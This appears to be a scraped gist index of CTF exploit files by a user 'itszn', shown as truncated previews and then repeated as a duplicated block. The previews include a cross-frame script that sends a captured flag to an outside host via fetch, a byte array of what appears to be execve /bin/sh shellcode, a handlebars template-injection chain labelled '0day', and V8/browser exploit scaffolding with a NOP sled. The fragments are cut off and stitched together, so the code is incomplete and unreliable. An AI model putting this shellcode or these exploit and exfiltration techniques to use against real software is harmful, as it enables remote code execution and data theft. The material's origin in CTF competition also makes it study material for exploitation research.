Amy itszn

## quickjs.js
/*
 * This exploit is targeting linux, tested on ubuntu 18.04
 * Techniques should generally work on other OSs but I don't have any to test easily
 */
// Debugging functions
if (this.debug === undefined)
  this.debug = ()=>{}
if (this.cc === undefined)
  this.cc = ()=>{}

## solve1.html
<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
<script>
let i=0;
window.addEventListener("message", function(event) {
  msg = event.data;
  console.log("attacker got ",msg);
  if (msg.id == 0) {
    a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
  } else if (msg.id == 1) {
    fetch("http://itszn.com/?flag="+msg.output);

## 0day.handlebars
//First we want to create an array
{{#with "a" as |str|}}
{{#with split as |list|}}

//Store some function that returns a truthy value into the array
//We use arrays to hold functions because handlebars will call functions
{{this.pop}}
{{this.push this.toString}}
{{this.pop}}

## exploit.js
let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];

let conva = new ArrayBuffer(8)
let convi = new Uint32Array(conva);
let convf = new Float64Array(conva);

function i2f(i) {
  convi[0] = i%0x100000000;
  convi[1] = i/0x100000000;
  return convf[0];

## jquery-latest.js
/*! jQuery v3.4.1 | (c) JS Foundation and other contributors | jquery.org/license */
!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],E=C.document,r=Object.getPrototypeOf,s=t.slice,g=t.concat,u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"object"==typeof e||"function"==typeof e?n[o.call(e)]||"object":typeof e}var f="3.4.1",k=function(e,

## exploit.js
// Load Int library, thanks saelo!
load('util.js');
load('int64.js');


// Helpers to convert from float to in a few random places
var conva = new ArrayBuffer(8);
var convf = new Float64Array(conva);
var convi = new Uint32Array(conva);
var convi8 = new Uint8Array(conva);

## d8.js
/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */


/* ### Utils, thanks saelo ### */

//
// Tiny module that provides big (64bit) integers.
//
// Copyright (c) 2016 Samuel Groß
//

## gist:0eaac8657401d08f3b9d25ffc87875d7
301345b6e7e96c9d37137fbcab602685178e922c81e5da545c7958d9cd3315e9

## exploit.html
<script>
function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }

var sc = [];
for (var i=0; i<0x480; i++) {
    sc.push(0x90);
}
//sc.push(0xcc);
//sc.push(0xeb);
//sc.push(0xfe);

## subleq.py
from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
    InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
    BranchType,
    LowLevelILOperation, LLIL_TEMP,
    LowLevelILLabel,
    FlagRole,
    LowLevelILFlagCondition,
    log_error,
    CallingConvention,
    interaction,
	/*
	* This exploit is targeting linux, tested on ubuntu 18.04
	* Techniques should generally work on other OSs but I don't have any to test easily
	*/
	// Debugging functions
	if (this.debug === undefined)
	this.debug = ()=>{}
	if (this.cc === undefined)
	this.cc = ()=>{}
	<iframe src="http://crackme.web.chal.csaw.io/" id="a"></iframe>
	<script>
	let i=0;
	window.addEventListener("message", function(event) {
	msg = event.data;
	console.log("attacker got ",msg);
	if (msg.id == 0) {
	a.contentWindow.postMessage({type:'run', id: i++, from:'page'},'*');
	} else if (msg.id == 1) {
	fetch("http://itszn.com/?flag="+msg.output);
	//First we want to create an array
	{{#with "a" as \|str\|}}
	{{#with split as \|list\|}}

	//Store some function that returns a truthy value into the array
	//We use arrays to hold functions because handlebars will call functions
	{{this.pop}}
	{{this.push this.toString}}
	{{this.pop}}
	let sc = [106,104,72,184,47,98,105,110,47,47,47,115,80,72,137,231,104,114,105,1,1,129,52,36,1,1,1,1,49,246,86,106,8,94,72,1,230,86,72,137,230,49,210,106,59,88,15,5];

	let conva = new ArrayBuffer(8)
	let convi = new Uint32Array(conva);
	let convf = new Float64Array(conva);

	function i2f(i) {
	convi[0] = i%0x100000000;
	convi[1] = i/0x100000000;
	return convf[0];
	// Load Int library, thanks saelo!
	load('util.js');
	load('int64.js');


	// Helpers to convert from float to in a few random places
	var conva = new ArrayBuffer(8);
	var convf = new Float64Array(conva);
	var convi = new Uint32Array(conva);
	var convi8 = new Uint8Array(conva);
	/* Plaid CTF 2018 v8 Exploit. Exploit begins around line 240 */


	/* ### Utils, thanks saelo ### */

	//
	// Tiny module that provides big (64bit) integers.
	//
	// Copyright (c) 2016 Samuel Groß
	//
	<script>
	function gc() { for (let i = 0; i < 0x10; i++) { new ArrayBuffer(0x1000000); } }

	var sc = [];
	for (var i=0; i<0x480; i++) {
	sc.push(0x90);
	}
	//sc.push(0xcc);
	//sc.push(0xeb);
	//sc.push(0xfe);
	from binaryninja import (Architecture, RegisterInfo, InstructionInfo,
	InstructionTextToken, InstructionTextTokenType, InstructionTextTokenContext,
	BranchType,
	LowLevelILOperation, LLIL_TEMP,
	LowLevelILLabel,
	FlagRole,
	LowLevelILFlagCondition,
	log_error,
	CallingConvention,
	interaction,